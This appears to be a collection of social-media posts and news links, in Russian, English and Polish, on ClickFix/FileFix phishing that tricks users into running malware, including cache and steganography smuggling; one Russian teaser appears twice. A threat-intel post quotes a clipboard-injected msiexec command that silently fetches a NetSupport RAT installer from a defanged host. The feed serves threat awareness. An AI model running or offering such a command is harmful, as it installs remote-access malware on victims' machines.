[Перевод] В кэше — фотка, в ней payload: новый метод скрытой доставки зловредов

Недавно в ходе рутинной разведки угроз я наткнулся на необычную фишинговую страницу, которая комбинирует социальную инженерию и коварный payload под видом обычной JPEG-картинки, убеждая пользователя самостоятельно выполнить вредоносный код. В типичных сценариях злоумышленники пытаются заставить жертву скачать исполняемый файл из сети — но тут всё хитрее. Страница прячет в кэше браузера вредоносный файл, замаскированный под изображение, а затем просит жертву выполнить «безобидную» команду, которая извлекает payload из кэша. В результате получаем локальный запуск кода, который не фиксируется средствами сетевого мониторинга. По сути, атака умело сочетает две техники: принуждение к локальному исполнению (ClickFix/FileFix) и контрабанду кэша (Cache Smuggling). В статье я подробно разберу каждый из этих приемов и покажу, как можно сделать доставку полезной нагрузки еще более незаметной.

https://habr.com/ru/companies/bastion/articles/967312/?utm_source=habrahabr&utm_medium=rss&utm_campaign=967312

#exif_smuggling #cache_smuggling #контрабанда_exif #filefix #clickfix #фишинг #контрабанда_кэша #безопасность_браузеров #информационная_безопасность #социальная_инженерия

[Перевод] В кэше — фотка, в ней payload: новый метод скрытой доставки зловредов

Недавно в ходе рутинной разведки угроз я наткнулся на необычную фишинговую страницу, которая комбинирует социальную инженерию и коварный payload под видом обычной JPEG-картинки, убеждая пользователя самостоятельно выполнить вредоносный код. В типичных сценариях злоумышленники пытаются заставить жертву скачать исполняемый файл из сети — но тут всё хитрее. Страница прячет в кэше браузера вредоносный файл, замаскированный под изображение, а затем просит жертву выполнить «безобидную» команду, которая извлекает payload из кэша. В результате получаем локальный запуск кода, который не фиксируется средствами сетевого мониторинга. По сути, атака умело сочетает две техники: принуждение к локальному исполнению (ClickFix/FileFix) и контрабанду кэша (Cache Smuggling). В статье я подробно разберу каждый из этих приемов и покажу, как можно сделать доставку полезной нагрузки еще более незаметной.

https://habr.com/ru/companies/bastion/articles/967312/

#exif_smuggling #cache_smuggling #контрабанда_exif #filefix #clickfix #фишинг #контрабанда_кэша #безопасность_браузеров #информационная_безопасность #социальная_инженерия

⚠️ #ClickFix malware tricks users into infecting themselves, bypassing traditional security. In 2025, it became #2 vector after #phishing.

See how @atEricParker dissected ClickFix attacks including the new #FileFix variant 👇
https://any.run/cybersecurity-blog/click-fix-attacks-eric-parker-analysis/?utm_source=mastodon&utm_medium=post&utm_campaign=clickfix-attacks&utm_content=linktoblog&utm_term=121125

#cybersecurity #infosec

New #FileFix attack uses cache smuggling to evade security software

https://www.bleepingcomputer.com/news/security/new-filefix-attack-uses-cache-smuggling-to-evade-security-software/

#cybersecurity

One sneaky HTTP header is all it takes—attackers are using FileFix to smuggle malware past top security defenses. How vulnerable is your cache?

https://thedefendopsdiaries.com/cache-smuggling-how-the-filefix-attack-outsmarts-security-defenses/

#cache-smuggling
#filefix-attack
#web-security
#cybersecurity-threats
#http-headers

FileFix – atak phishingowy wykorzystujący Eksplorator Systemu Windows

Badacze bezpieczeństwa z Acronis Threat Research Unit zaobserwowali nową kampanię phishingową wykorzystującą metodę ataku FileFix. Atak wyróżnia się nietypowym sposobem ukrywania złośliwego oprogramowania – zastosowanie obfuskacji oraz steganografii. FileFix stanowi nowy wariant popularnego wektora ataku ClickFix. Podobnie jak w przypadku tego wektora, celem ataku jest nakłonienie użytkownika do samodzielnego uruchomienia...

#WBiegu #Clickfix #Filefix #Meta #Phishing #Stealc

https://sekurak.pl/filefix-atak-phishingowy-wykorzystujacy-eksplorator-systemu-windows/

2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

#clipboardhijacking Script injected into clipboard:

msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

The downloaded file is an MSI for #NetSupportRAT

https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a

The Register: FileFix attacks use fake Facebook security alerts to trick victims into running infostealers. “An attack called FileFix is masquerading as a Facebook security alert before ultimately dropping the widely used StealC infostealer and malware downloader on Windows machines.”

https://rbfirehose.com/2025/09/20/the-register-filefix-attacks-use-fake-facebook-security-alerts-to-trick-victims-into-running-infostealers/

New #FileFix attack uses #steganography to drop #StealC #malware

https://www.bleepingcomputer.com/news/security/new-filefix-attack-uses-steganography-to-drop-stealc-malware/

#cybersecurity #cybercrime